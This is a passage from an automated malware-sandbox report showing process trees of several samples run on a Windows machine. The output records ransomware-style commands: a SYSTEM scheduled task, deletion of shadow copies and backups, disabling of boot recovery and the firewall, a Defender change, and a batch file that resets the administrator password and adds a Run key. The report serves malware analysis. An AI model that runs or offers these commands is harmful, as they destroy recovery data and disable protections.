- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5848 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
PID:4192
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵PID:23104
-
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"1⤵
- Executes dropped EXE
PID:5360
-
C:\Windows\system32\pcwrun.exeC:\Windows\system32\pcwrun.exe "C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe" ContextMenu1⤵PID:4300
-
C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWFFB8.xml /skip TRUE2⤵
- Suspicious use of FindShellTrayWindow
PID:3856
-
-
C:\Windows\System32\sdiagnhost.exeC:\Windows\System32\sdiagnhost.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxajrlbz\dxajrlbz.cmdline"2⤵PID:5024
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40D.tmp" "c:\Users\Admin\AppData\Local\Temp\dxajrlbz\CSC2575887E8B184585B3B9C44FB5636CE2.TMP"3⤵PID:5268
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4sok3ih\s4sok3ih.cmdline"2⤵PID:4364
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46B.tmp" "c:\Users\Admin\AppData\Local\Temp\s4sok3ih\CSC502B6C4B714E42C08C50A36E9A33D40.TMP"3⤵PID:1272
-
-
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"1⤵
- Executes dropped EXE
PID:3708
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\00acf5d0db7ef50140dae7a3482d9db80704ec98670bd1607e76c99382a4888c\" -ad -an -ai#7zMap24245:190:7zEvent145661⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\" -ad -an -ai#7zMap8206:190:7zEvent117351⤵
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"1⤵
- Executes dropped EXE
PID:4280 -
C:\Windows\system32\net.exe"net" session2⤵PID:5900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:3796
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5556 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\README-7ILxnOHKLf.md2⤵PID:2036
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\" -ad -an -ai#7zMap295:190:7zEvent310451⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F2⤵
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2osrakf2\2osrakf2.cmdline"2⤵
- System Location Discovery: System Language Discovery
PID:524 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1C6.tmp" "c:\ProgramData\CSC8BF11E4749A64B498E688F446F4116AB.TMP"3⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
- System Location Discovery: System Language Discovery
PID:1112
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- System Location Discovery: System Language Discovery
PID:5788
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off2⤵
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:3720 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\winlogon.exe1⤵PID:1608
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\winlogon.exe1⤵PID:3216
-
C:\Windows\winlogon.exeC:\Windows\winlogon.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:564
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Restore-My-Files.txt1⤵PID:1792
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\" -ad -an -ai#7zMap21156:190:7zEvent322971⤵PID:4824
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat1⤵
- Opens file in notepad (likely ransom note)
PID:3464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat" "1⤵
- Drops file in System32 directory
PID:1580 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
PID:3012
-
-
C:\Windows\system32\net.exenet user administrator 42172⤵PID:904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator 42173⤵PID:1072
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Tsuchigumo.bat /d "C:\Windows\system32\Tsuchigumo.bat" /f2⤵
- Adds Run key to start application
PID:5800
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Control Panel\Desktop" /v Wallpaper /f2⤵PID:1468
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3744
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4456
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:6088
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:632
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4828
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:1544
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:5984
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2684
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1000
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2412
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:5464
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3708
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4272
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:656
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4200 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:5932
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4192 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27100 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {cf100be8-2294-4b67-924c-1a28b4bad1f8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu4⤵PID:4900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2456 -prefsLen 27136 -prefMapHandle 2460 -prefMapSize 270279 -ipcHandle 2352 -initialChannelId {ea6a6bb9-2061-4fa0-81b9-96aa9f2d07b6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket4⤵
- Checks processor information in registry
PID:3664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 27277 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {8cb57d87-1612-4d70-9299-0c7c3e2dd7b0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab4⤵
- Checks processor information in registry
PID:544
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27277 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {934fac5d-d6b9-4071-9951-1037fe04c929} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd4⤵PID:3180
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4516 -prefsLen 34776 -prefMapHandle 4520 -prefMapSize 270279 -jsInitHandle 4524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3104 -initialChannelId {6a3c3fc0-959c-4382-8432-5b332968fe16} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab4⤵
- Checks processor information in registry
PID:4744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4996 -prefsLen 35013 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 5008 -initialChannelId {9646553d-9121-4fe2-8d04-e043c3e815c8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility4⤵
- Checks processor information in registry
PID:6476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 32952 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 2744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4088 -initialChannelId {093b4033-a523-441b-bd2f-0876a43d0606} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab4⤵
- Checks processor information in registry
PID:6916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4092 -prefsLen 32952 -prefMapHandle 3064 -prefMapSize 270279 -jsInitHandle 3208 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {8e7b1b81-d775-44bc-85e3-decf504334d0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab4⤵
- Checks processor information in registry
PID:6928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5680 -prefsLen 32952 -prefMapHandle 5684 -prefMapSize 270279 -jsInitHandle 5688 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3064 -initialChannelId {0a844bbe-c5fc-4dcf-99a9-dadc3204b4b2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab4⤵
- Checks processor information in registry
PID:6940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5840 -prefsLen 32952 -prefMapHandle 5844 -prefMapSize 270279 -jsInitHandle 5848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5856 -initialChannelId {9ae096be-d918-4601-9f32-14ee8fb92ef0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab4⤵
- Checks processor information in registry
PID:6952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 32952 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5916 -initialChannelId {78b4221d-c8fb-4301-99ea-3711501afe2a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab4⤵
- Checks processor information in registry
PID:6964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6088 -prefsLen 32952 -prefMapHandle 6092 -prefMapSize 270279 -jsInitHandle 6096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6104 -initialChannelId {82a4c713-8ca8-421f-81fb-6cfbc8e4de91} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab4⤵
- Checks processor information in registry
PID:6980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6300 -prefsLen 32952 -prefMapHandle 6304 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6316 -initialChannelId {4599cb2d-c725-4e90-8eaa-9f6f4d11974b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab4⤵
- Checks processor information in registry
PID:6992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6488 -prefsLen 32952 -prefMapHandle 6492 -prefMapSize 270279 -jsInitHandle 6496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6504 -initialChannelId {59312b7a-b589-47f2-b759-c7b0e5224fd2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab4⤵
- Checks processor information in registry
PID:7004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6676 -prefsLen 32952 -prefMapHandle 6680 -prefMapSize 270279 -jsInitHandle 6684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6692 -initialChannelId {afb744f3-a5cd-4a76-a2ea-cd3c60ca72e3} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab4⤵
- Checks processor information in registry
PID:7016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6864 -prefsLen 32952 -prefMapHandle 6868 -prefMapSize 270279 -jsInitHandle 6872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6880 -initialChannelId {63085a67-25bf-47c0-b959-7d3e63cd6a8d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab4⤵
- Checks processor information in registry
PID:7036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7076 -prefsLen 32952 -prefMapHandle 7080 -prefMapSize 270279 -jsInitHandle 7084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7088 -initialChannelId {c081b01e-9395-405b-b414-c81d68a21da6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 17 tab4⤵PID:7056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7284 -prefsLen 32952 -prefMapHandle 7288 -prefMapSize 270279 -jsInitHandle 7292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7300 -initialChannelId {74a5be6f-7089-4dd8-a793-e7bd280996e6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 18 tab4⤵
- Checks processor information in registry
PID:7068
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7328 -prefsLen 32952 -prefMapHandle 7316 -prefMapSize 270279 -jsInitHandle 7416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7488 -initialChannelId {d9558668-c643-455b-a073-305d17cf2027} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 19 tab4⤵
- Checks processor information in registry
PID:7080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7660 -prefsLen 32952 -prefMapHandle 7664 -prefMapSize 270279 -jsInitHandle 7668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7676 -initialChannelId {91721b9e-3c1d-4f9d-b530-972ac4cf62c9} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 20 tab4⤵
- Checks processor information in registry
PID:7092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7848 -prefsLen 32952 -prefMapHandle 7852 -prefMapSize 270279 -jsInitHandle 7856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7864 -initialChannelId {68c2e1b8-cdb2-40c0-80a8-3fbd3b9fe732} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 21 tab4⤵
- Checks processor information in registry
PID:7104
-
-
